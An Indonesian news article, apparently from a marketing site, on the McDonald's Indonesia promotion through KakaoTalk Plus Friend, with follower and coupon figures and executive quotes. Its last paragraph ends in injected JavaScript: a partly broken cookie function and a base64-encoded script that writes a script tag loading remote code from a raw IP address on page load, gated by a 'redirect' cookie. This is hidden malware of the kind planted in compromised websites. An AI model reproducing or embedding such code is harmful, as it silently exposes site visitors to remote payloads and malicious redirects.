Plus Friend, Alternatif Pemasaran Mobile yang Potensial

Baru-baru ini, McDonald’s mengumumkan bahwa promosi terbarunya melalui KakaoTalk Plus Friend terbilang berhasil mendapat respon positif dari konsumen Akun Plus Friend McDonald’s hanya membutuhkan waktu 4 hari untuk mencapai 100.000 pengikut, dan 14 hari untuk mencapai 300.000 pengikut.

Dalam waktu empat hari, akun Plus Friend McDonald’s di Kakao Talk berhasil di-follow 100.000 follower, dan dalam waktu 14 hari telah mencapai 300.000 follower.

Selain itu, penukaran kupon yang dikirimkan setiap Rabu pagi sejak McDonald's resmi bekerja sama dengan Kakao Talk lewat aplikasi Plus Friend pada 4 Desember 2013 lalu, juga meningkat 590 persen dalam satu minggu, dan menjadikan promosi tersebut sebagai perbincangan hangat di social media. Tak hanya itu, sekitar 87 persen dari pesan yang dikirimkan Plus Friend McDonald’s ke chat room dibaca oleh pengguna.

Michael Hartono, Marketing and Communications Director McDonald’s Indonesia mengatakan, “Keberhasilan yang kami dapat dari promosi lewat Plus Friend KakaoTalk-McDonald’s ini menunjukkan masyarakat Indonesia sangat mencintai produk McDonald’s. Dan sekaligus membuktikan keberhasilan dari program kemitraan bersama KakaoTalk."

Menurutnya, program yang dimulai sejak awal Desember 2013 (4/12) ini juga menawarkan promosi “Beli 1 Gratis 1” untuk paket hemat McChicken bagi semua pengguna KakaoTalk yang telah berteman dengan akun Plus Friend McDonald's.

"Program kerja sama lewat Plus Friend ini akan berlangsung hingga akhir Februari 2014 mendatang. Kami harap akan lebih banyak lagi masyarakat Indonesia yang bergabung dan merasakan pengalaman yang seru dan menyenangkan dengan Plus Friend McDonald’s,” imbuh Michael.

Duke Kim, Global Marketing Director Kakao Corp. menambahkan, “Antusiasme ini turut menunjukkan bagaimana KakaoTalk Plus Friend telah menjadi tren baru bagi orang-orang Indonesia untuk mencari dan menikmati penawaran terbaik dengan cara yang seru dan keren, dan di saat yang bersamaan membuktikan fitur Plus Friend sebagai alat pemasaran mobile yang efektif bagi merek apa saja.” function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Sign In

Get the most out of SWA by signing in to your account

(close)

Register

Have an account? Sign In
(close)